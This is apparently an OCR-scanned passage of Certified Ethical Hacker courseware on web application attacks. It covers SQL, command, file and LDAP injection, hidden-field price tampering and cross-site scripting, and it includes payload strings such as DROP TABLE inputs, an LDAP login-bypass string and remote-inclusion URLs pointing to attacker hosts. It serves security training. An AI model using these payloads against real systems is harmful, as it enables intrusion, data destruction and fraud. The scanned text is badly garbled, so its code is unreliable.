  45. 45. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications C E HS Q L I n j e c t i o n A t t a c k s J SQL injection attacks use a series o f m alicious SQL queries to directly m anipulate the database J An attacker can use a vulnerable w eb application to bypass norm al se curity m easures and obtain direct access to the valuable data J SQL injection attacks can often be executed fro m the address bar, fro m w ithin application fields, and through queries and searches SQL injection attacks 01 < ? p h p 02 f u n c t i o n s a v e e m a il ( $ u s e r , $ m e s s a g e ) 03 { 04 $ s q l = "IN S E R T IN TO M e s s a g e s ( 05 u s e r , m e s s a g e 06 ) VALUES ( 07 ' $ u s e r 1 , ' $ m e s s a g e ' 08 ) 09 r e t u r n m y s q l_ q u e r y ( $ s q l) ; 10 } 11 ?> In te rn e tW eb ■‫נ‬....................... B row ser t e s t') ;D R O P TABLE M e s s a g e s ;- - When this code is sent to the database server, it drops the Messages table Code to insert spam m y data on behalf of o th e r users SC*L Injection vulnerable server code t e s t ' ) , ( ' u s e r 2 ' , '1 am J a s o n ') , ( ' u s e r 3 ' , 'Y o u a r e h a c k e dA ttacker N ote: For com plete coverage o f SQL Injection concepts and techniques, refer to M odule 14: SQL Injection C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . S Q L I n j e c t i o n A t t a c k s SQL injection attacks use com m and sequences from S tructured Q uery Language (SQL) statem ents to control database data directly. A pplications often use SQL statem ents to authenticate users to the application, validate roles and access levels, store and obtain inform ation fo r the application and user, and link to o th e r data sources. Using SQL injection m ethods, an attacker can use a vulnerable w eb application to avoid norm al security measures and obtain direct access to valuable data. The reason w hy SQL injection attacks w ork is th a t the application does not properly validate input before passing it to a SQL statem ent. For exam ple, the follow ing SQL statem ent, s e le c t * from tablenam e where User1D= 2302 becom es the follow ing w ith a sim ple SQL injection attack: SELECT * FROM tablenam e WHERE U serID = 2302 OR 1=1 The expression "OR 1=1" evaluates to the value "TRUE," often allow ing the enum eration o f all user ID values from the database. SQL injection attacks can often be entered fro m the address bar, from w ith in application fields, and through queries and searches. SQL injection attacks can allow an attacker to: © Log in to the application w ith o u t supplying valid credentials Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1767
  46. 46. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications © Perform queries against data in the database, often even data to which the application w ould not norm ally have access © M odify the database contents, or drop the database altogether © Use the tru st relationships established betw een the web application com ponents to access oth e r databases 01 < ? p h p 02 f u n c t i o n s a v e e m a il ( ? u s e r , ? m e s s a g e ) 03 < 04 $ s q l = "IN S E R T IN T O M e s s a g e s ( 05 u s e r , m e s s a g e 06 ) VALUES ( 07 ' ? u s e r ' , '? m e s s a g e ' 08 ) " ; 09 r e t u r n m y s q l q u e r y ( $ s q l ) ; 10 } 11 ?> SQL Injection vulnerable server code 'Y o u a r e h a c k e d Internet m i W e b B ro w se r A t e s t ') ; D R O P TA BLE M e s s a g e s ;— W hen this code is sent to the database server, it drops the Messages table Code to insert spammy data on behalf of other users t e s t ' ) , ( ' u s e r 2 ' , '1 am J a s o n ') , C u s e r 3 ' FIGURE 1 3 .8 : SQL In je c tio n A tta c k s Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1768
  47. 47. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications - C o m m a n d I n j e c t i o n A t t a c k s C E H J An a tta c k e r trie s to c ra ft an in p u t s trin g to g a in shell access to a w e b se rver J Shell In je c tio n fu n c tio n s in c lu d e s y s t e m ( ) , s t a r t P r o c e s s ( ) , ja v a . l a n g . R u n tim e . e x e c ( ) ,S y s te m . D ia g n o s t ic s . P ro c e s s . S t a r t ( ) , a nd s im ila r APIs This ty p e o f a tta c k is used to d e fa c e w e b s ite s v irtu a lly . U sing th is a tta c k , an a tta c k e r add s an e x tra H T M L -ba se d c o n te n t to th e v u ln e ra b le w e b a p p lic a tio n In H TM L e m b e d d in g a tta cks, u ser in p u t to a w e b s c rip t is pla ce d in to th e o u tp u t H TM L, w ith o u t b e in g checked fo r H TM L co d e o r s c rip tin g J J The a tta c k e r e x p lo its th is v u ln e ra b ility a nd in je c ts m a lic io u s co de in to syste m file s J h t t p : / /w w w . ju g g y b o y . c o m / v u ln e r a b le . p h p ? C O L O R = h ttp : / / e v i l / e x p l o i t ? C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . C o m m a n d I n j e c t i o n A t t a c k s — — Com mand injection flaws allow attackers to pass m alicious code to d iffe re n t systems via a w eb application. The attacks include calls to the operating system over system calls, use of external program s over shell com m ands, and calls to the backend databases over SQL. Scripts th a t are w ritte n in Perl, Python, and oth e r languages execute and insert the poorly designed w eb applications. If a w eb application uses any type o f inte rp re te r, attacks are inserted to inflict damage. To perform functions, web applications m ust use operating system features and external program s. Although m any program s invoke externally, the fre q u e n tly used program is Sendmail. W hen a piece o f inform ation is passed through the HTTP external request, it m ust be carefully scrubbed, or the attacker can insert special characters, m alicious com m ands, and com m and m odifiers into the inform ation. The w eb application then blindly passes these characters to the external system fo r execution. Inserting SQL is dangerous and rather w idespread, as it is in the form o f com m and injection. Command injection attacks are easy to carry out and discover, but they are tough to understand. ^ = = 3 S h e ll I n j e c t i o n 1 To com plete various functionalities, w eb applications use various applications and program s. It is ju st like sending an em ail by using the UNIXsendmail program . There is a chance th a t an attacker may inject code into these program s. This kind o f attack is dangerous Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1769
  48. 48. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications especially to w eb page security. These injections allow intruders to perform various types of m alicious attacks against the user's server. An attacker tries to craft an input string to gain shell access to a w eb server. Shell injection functions include system (), Start Process (), java.lang.Runtim e.exec (), System.Diagnostics.Process.Start (), and sim ilar APIs. H T M L E m b e d d i n g This type o f attack is used to deface w ebsites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML em bedding attacks, user input to a w eb script is placed into the o u tp u t HTML, w ith o u t being checked fo r HTML code or scripting. F i l e I n j e c t i o n a The attacker exploits this vulnerability and injects m alicious code into system files: http://w w w .iugg vbov.com /vulnerable.p hp?C O LO R = http://evil/e xploit Users are allow ed to upload various files on the server through various applications and those files can be accessed through the Internet from any part o f the w orld. If the application ends w ith a php extensionand if any user requests it, then the application interprets it as a php script and executes it. This allows an attacker to perform arbitrary com m ands. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1770
  49. 49. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications C o m m a n d I n j e c t i o n E x a m p l e http://juggyboy/cgi‫־‬ bin/lspro/lspro.cgi?hit_out=1036 c o m^ J u g g y B o y CUser Name Addison ‫נ‬ ‫כ‬ Email Address a d d i@ juggyboy.co~ Site URL ^ www.juggyboy.com Banner URL [ ■gif ||newpassword|1036|60|468 Password [ newpassword Poor input validation at server script was exploited in this attack that uses database INSERT and UPDATE record command Attacker Launching Code Injection Attack M alicious code: w w w . ju g g y b o y . c a m /b a im e r . g ifl|n e w p a s s w o r d ||1 0 3 6 |6 0 |4 6 8 S An attacker enters m alicious code (account num ber) w ith a new password 6 The last tw o sets o f num bers are the banner size « Once th e attacker clicks the subm it b u tto n , the passw ord fo r the account 1036 is changed to "ne w pa ssw o rd" 9 The server script assumes th a t only the URL o f th e banner image file is inserted into th a t field C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . C o m m a n d I n j e c t i o n E x a m p l e The follow ing is an exam ple o f com m and injection: To perform a com m and injection attack, the attacker first enters m alicious code (account num ber) w ith a new password. The last tw o sets o f num bers are the banner size. Once the attacker clicks the subm it button, the password fo r the account 1036 is changed to "new passw ord." The server script assumes th a t only the URL o f the banner image file is inserted into th a t field. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1771
  50. 50. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications © M [•..................... > I f http//juggYtx>y/cgibin/lspr0/lspf0cgi?ht1 out 1036 .com A ttacker Launching Code Injection A ttack M alicious code: U M f N«m« Addison ‫כ‬ ‫כ‬ Email Addreu ^ addigojuggytooycom Sit• U R I [ wwwiuggyboycom 1nn#f URL [ .g if) |newpjssword|1036|fc0|468 ] Password [ ncwpjsswofd ] ! w w w .^u g g y b o y .c o m /b a n n e r.g ifl|n e w p a s s w o rd l|1 0 3 6 1601468 P o o r in p u t v a lid a tio n a t se rver scrip t w a s e x p lo ite d in th is a tta ck th a t u se s d a ta b a se INSERT an d U PD A TE re co rd co m m a n d FIGURE 1 3 .9 : C o m m a n d In je c tio n E xa m p le Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1772
  51. 51. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications C E HF i l e I n j e c t i o n A t t a c k <?php $ d r in k = 'c o k e '; i f ( i s s e t ( $ _ G E T [ 'DRINK'] ) $d r i n k = $ _ G E T [ 'DRINK'] ; r e q u i r e ( $ d r in k . ' .p h p ’ ) ; ?> © $ d r in k r e q u i r e ( J .....:‫ך‬ G O <form m eth od = " get"> < s e l e c t name="DRINK"> < o p tio n v a lu e = " p e p si" > p e p si< /o p tio n > < o p tio n v a lu e= " cok e ‫יי‬>coke< / o p t i on> < / s e le c t > C input ty p e ="su b m it"> </form > C lient code running in a b row ser h t t p : // w w w .j u g g y b o y .c o m /o r d e r s .p h p ? D R I N K = h t t p : / / j a s o n e v a l . c o m / e x p l o i t ? < File injection attacks enable attackers to e xp lo it vulnerable scripts on the server to use a rem ote file instead o f a presum ably trusted file fro m the local file system C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . Attacker injects a rem otely hosted file at w w w .jasoneval.com containing an exploit e A ttacker F i l e I n j e c t i o n A t t a c k Users are allow ed to upload various files on the server through various applications and those files can be accessed through the Internet from anyw here in the w orld. If the application ends w ith a php extension and if any user requests it, then the application interprets it as a php script and executes it. This allows an attacker to perform a rb itra ry com m ands. File injection attacks enable attackers to exploit vulnerable scripts on the server to use a rem ote file instead o f a presum ably trusted file from the local file system. Consider the follow ing client code running in a brow ser: < form m e th o d = "g e t"> < s e le c t name="DRINK"> C o p tio n v a lu e = " p e p s i"> p e p s i< /o p tio n > C o p tio n v a lu e = "c o k e "> c o k e < /o p tio n > < /s e le c t> < in p u t ty p e = "s u b m it"> < / forra> V ulnerable PHP code <?php $ d rin k = 'c o k e '; Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1773
  52. 52. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications i f ( is s e t ( $_G E T ['D R IN K '] ) ) $ d rin k = $_GET[ 'DRINK' ] ; r e q u ir e ( $ d rin k . ' .p h p ' ) ; ?> To exploit the vulnerable php code, the attacker injects a rem otely hosted file at w w w .jasoneval.com containing an exploit. E xploit code http ://w w w .iuggvboy.com/orders. php?DRINK=http://iasoneval.com /exploit? Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1774
  53. 53. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications W h a t I s L D A P I n j e c t i o n ? C E H I (•rtifwtf itfciul ■UtlM An LDAP in je c tio n te c h n iq u e is used to ta k e a d va n ta g e o f n o n -v a lid a te d w e b a p p lic a tio n in p u t v u ln e ra b ilitie s to pass LDAP filte rs used fo r se a rch in g D ire c to ry Services to o b ta in d ire c t access to d a ta b a se s b e h in d an LDAP tre e Filter Syntax O perator ( a tt r ib u t e N a m e o p e r a t o r v a lu e ) Example = (a b je c tc la s s = u s e r) > = (mdbStorageQuota>=l00000) < = (mdbStorageQuota<=l00000) ~ = (d i sp 1ayName~=Foecke1e r ) * (displayName—* Jo h n *) AND (&) OR (|) (&(o b je c tc la s s -u s e r) (displayNam e—John) (|(o b je c tc la s s = u s e r) (displayName=John) N O T(!) ( fo b je ctC la ss= g ro u p ) LDAP D irectory Services store and organize inform ation based on its attributes. The inform ation is hierarchically organized as a tree o f directory entries LDAP is based on the dient-server model and clients can search the directory entries using filte rs (*■ a. WJ Q J V)•pH (0 A * C o p yrig h t © by E&Coinal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . W h a t i s L D A P I n j e c t i o n ? An LDAP (Lightw eight D irectory Access Protocol) injection attack works in the same way as a SQL injection attack. All the inputs to the LDAP m ust be properly filtered, otherw ise vulnerabilities in LDAP allow executing unauthorized queries or m o d ifica tio n o f the contents. LDAP attacks e xp lo it web-based applications constructed based on LDAP statem ents by using a local proxy. LDAP statem ents are m odified when certain applications fail. These services store and organize inform ation based on its attributes. The inform ation is hierarchically organized as a tree o f directory entries. It is based on the client-server m odel and clients can search the directory entries using filters. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1775
  54. 54. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications ( a t t r i b u t e N a m e o p e r a t o r v a l u e ) Example Filter Syntax O perator (d i splayN am e~=F oec k e le r ) (d i splayN am e=*Joh n *) (S (o b je c tc la s s = u s e r )(d is p la y N a m e = J o h n )AND (&) OR ( | ) (& (ob j e c t d s s s = u s e r ) (d±splayN am e=John) NOT (I) ( !o b je c tC la s s = g r o u p ) FIGURE 1 3 .1 0 : LDAP In je c tio n Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1776
  55. 55. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications H o w L D A P I n j e c t i o n W o r k s C E H n LDAP LDAP Server Normal Query + Code Injection Normal Result and/or Additional Information LDAP Normal Query Normal Result ClientLDAP ServerClient LDAP injection attacks are sim ilar to SQL injection attacks b ut e x p lo it user param eters to generate LDAP query To test if an application is vulnerable to LDAP code injection, send a query to the server m eaning th a t generates an invalid input. Ifth e LDAP server re tu rns an e rro r, it can be exploited w ith code injection techniques If an attacker enters valid user name "juggyboy", and injects juggyboy)(&)) then the URL string becomes (&(USER=juggyboy)(&))(PASS=blah)) only the first filter is processed by the LDAP server, only the query (&(USER=juggyboy)(&)) is processed. This query is always true, and the attacker logs into the system without a valid password Account Login | 1‫״‬ v ! Username juggyboy)(&)) 1Vv. : Password blah S u b m itA ttacker Copyright © by E&Coinal.All Rights Reserved. Reproduction is Strictly Prohibited. H o w L D A P I n j e c t i o n W o r k s ( H U LDAP injection attacks are com m only used on w eb applications. LDAP is applied to any o f the applications th a t have some kind of user inputs used to generate the LDAP queries. To test if an application is vulnerable to LDAP code injection, send a query to the server th a t generates an invalid input. If the LDAP server returns an error, it can be exploited w ith code injection techniques. Depending upon the im plem entation of the target, one can try to achieve: © Login Bypass © Inform ation Disclosure e Privilege Escalation © Inform ation A lteration Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1777
  56. 56. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications N orm al Q uery N orm al Result LDAP Server Normal operation *•‫י־‬ Client FIGURE 1 3 .1 1 : N o rm a l o p e ra tio n Operation with code injection < Client FIGURE 1 3 .1 2 : O p e ra tio n w ith co d e in je c tio n Attack If an attacker enters a valid user name o f "ju g g y b o y " and injects ju g g yb o y) (&)), then the URL string becomes (& (user=ju g g yb o y) (&)) (P A S S =blah)). Only the first filte r is processed by the LDAP server; only the query (& (USER=ju g g yb o y) (&)) is processed. This query is always true, and the attacker logs into the system w ith o u t a valid password. ‫ץ‬ □ c LDAP N orm al Q uery + Code Injection N orm al Result a n d /o r A dditional Info rm ation LDAP Server A ccount Login U sern a m e juggyboy)(&)) : P assw ord blah A tta c k e r FIGURE 1 3 .1 3 : A tta c k Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1778
  57. 57. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications H i d d e n F i e l d M a n i p u l a t i o n A t t a c k I C E H A ttack Request h t t p : / /w w w . ju g g y b o y . c o m /p a g e . a s p x ? p r o d u o t= J u g g y b o y % 2 0 S h i r t & p r i c e = 2 . 00 N orm al Request h t t p : / / w w w . ju g g y b o y . c o m /p a g e . a s p x ? p r o d u c t= J u g g y b o y % 2 O S h i r t & p r ic e = 2 0 0 .0 0 HTML Code < fo m method="post" action^ " page.asp x" > <in p u t type="hidden" name= "PRICE" val ue200 . 0 0 " ‫־‬ "> Product name: < inp u t type= " te x t‫״‬ name="product" v a lu e="Juggyboy S h ir t "X br> Product p r ic e : 2 0 0 .00" X b r> < inp u t type=" submit" valu e= "submit" > </form > $ When a user makes selections on an HTML page, the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST) 0 HTML can also store field values as hidden fields, which are not rendered to the screen by th e browser, but are collected and subm itted as parameters during form submissions 6 Attackers can examine th e HTML code o f the page and change the hidden field values in order to change post requests to server C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . Product Name Jugg yboy S h irt ^ [ 200 )Product Price Submit H i d d e n F i e l d M a n i p u l a t i o n A t t a c k Hidden m anipulation attacks are m ostly used against e‫־‬com m erce websites today. M any online stores face these problem s. In every client session, developers use hidden fields to store client inform ation, including price o f the product (Including discount rates). At the tim e of developm ent o f these such program s, developers feel th a t all the applications developed by them are safe, but a hacker can m anipulate the prices o f the product and com plete a transaction w ith price th a t he or she has altered, rather than the actual price o f the product. For exam ple: On eBay, a particular m obile phone is fo r sale fo r $1000 and the hacker, by altering the price, gets it fo r only $10. This is a huge loss fo r w ebsite owners. To protect th e ir netw orks from attacks, w ebsite owners are using the latest antivirus softw are, firew alls, intrusion detection systems, etc. If th e ir w ebsite is attacked, often it also loses its credibility in the m arket. W hen any target requests w eb services and makes choices on the HTML page, then the choices are saved as form field values and delivered to the requested application as an HTTP request (GET or POST). The HTML pages generally save field values as hidden fields and they are not displayed on the m o n ito r o f the target but saved and placed in the form o f strings or param eters at the tim e o f form subm ission. Attackers can exam ine the HTML code o f the page and change the hidden field values in order to change post requests to the server. < in p u t ty p e = ‫״‬ h id d e n " name= "PRICE" v a lu e = "2 0 0 . 00‫״‬ > Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1779
  58. 58. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications P ro d u c t name: < in p u t typ e = " t e x t " n a m e = "p ro d u ct" va lu e = "Ju g g yb o y S h ir t " x b r > P ro d u c t p r ic e : 2 0 0 . 00"><br> < in p u t ty p e = "s u b m it" v a lu e = 1's u b m it"> < /fo rm > 1. Open the htm l page w ith in an HTML editor. 2. Locate the hidden field (e.g., "<type=hidden nam e=price value=200.00>"). 3. M odify its content to a d iffe re n t value (e.g. "<type=hidden nam e=price value=2.00>"). 4. Save the htm l file locally and browse it. 5. Click the Buy button to perform electronic shoplifting via hidden m anipulation. A tta c k R e q u e st h t t p : / / w w w . ju g g y b o y . c o m /p a g e . a s p x ? p r o d u c t= J u g g y b o y % 2 0 S h i r t & p r i c e = 2 . 0 0 FIGURE 1 3 .1 4 : H id d e n F ie ld M a n ip u la tio n A tta c k N o rm a l R e q u e st HTM L Code H id d e n F ie ld P rice = 2 0 0 .0 0 h t t p : / /w w w . ju g g y b o y . c o m /p a g e . a s p x ? p r o d u c t= J u g g y b o y %2OS h i r t f i p r i c e = 2 0 0 .0 0 1 ! " <form m ethod="post" ;»nt‫־‬.‫־‬i n n s "p a g « .a«spx"> < in p u t typ e= " 11idden" name= "PRICE" v a lu e = " 2 0 0 .00" > P rod u ct nam e: < in p u t typ e= " tex t" nam e="product" valu e= " Ju ggyb oy S h ir t" X b r > P rod u ct p r ic e : 200.00" > < b r> < in p u t typ e=" sub m it" v a lu e = "subn'.it,,> < /fo r :‫>״‬ Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1780
  59. 59. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications C ross-site s c rip tin g (,XSS' or'C SS') a tta cks e x p lo it v u ln e ra b ilitie s in d y n a m ic a lly g e n e ra te d w e b pages, w hich ena b les m a licio u s a ttackers to in je c t c lie n t-s id e sc rip t in to w eb pages vie w e d by o th e r users It occurs w h e n in v a lid a te d in p u t d a ta is in clu d e d in d yn a m ic c o n te n t th a t is se n t to a user's w e b b ro w se r fo r re n d e rin g A ttacke rs in je c t m a licio u s JavaS cript, VBScript, A ctiveX , HTML, o r Flash fo r exe cu tio n on a v ic tim 's system by h id in g it w ith in le g itim a te re qu e sts Session hijacking Brute force password cracking Data theft Intranet probing Keylogging and rem ote monitoring Malicious script execution^‫ם‬ Redirecting to a malicious server^ ^I IExploitinguserprivileges 1'Ads in hidden !FRAMES and pop-ups^‫׳‬ ^ ^Datamanipulation C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Proh ibited C r o s s - S i t e S c r i p t i n g ( X S S ) A t t a c k s Cross-site scripting is also called XSS. V ulnerabilities occur when an attacker uses web applications and sends malicious code in JavaScript to d iffe re n t end users. It occurs w hen invalidated input data is included in dynam ic co n te n t th a t is sent to a user's w eb brow ser fo r rendering. W hen a w eb application uses input from a user, an attacker can com m ence an attack using th a t input, which can propagate to oth e r users as w ell. Attackers inject m alicious JavaScript, VBScript, ActiveX, HTML, or Flash fo r execution on a victim 's system by hiding it w ith in legitim ate requests. The end user may tru st the w eb application, and the attacker can exploit th a t tru st in order to do things th a t w ould not be allow ed under norm al conditions. An attacker often uses d iffe re n t m ethods to encode the m alicious portion (Unicode) o f the tag, so th a t a request seems genuine to the user. Some o f them are: © M alicious script execution - Session hijacking © Brute force password cracking - Redirecting to a m alicious server Q Exploiting user privileges - Data th e ft Q Intranet probing - Ads in hidden !FRAMES and pop-ups © Data m anipulation - Keylogging and rem ote m onitoring Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction isStrictly Prohibited. Module 13 Page 1781

×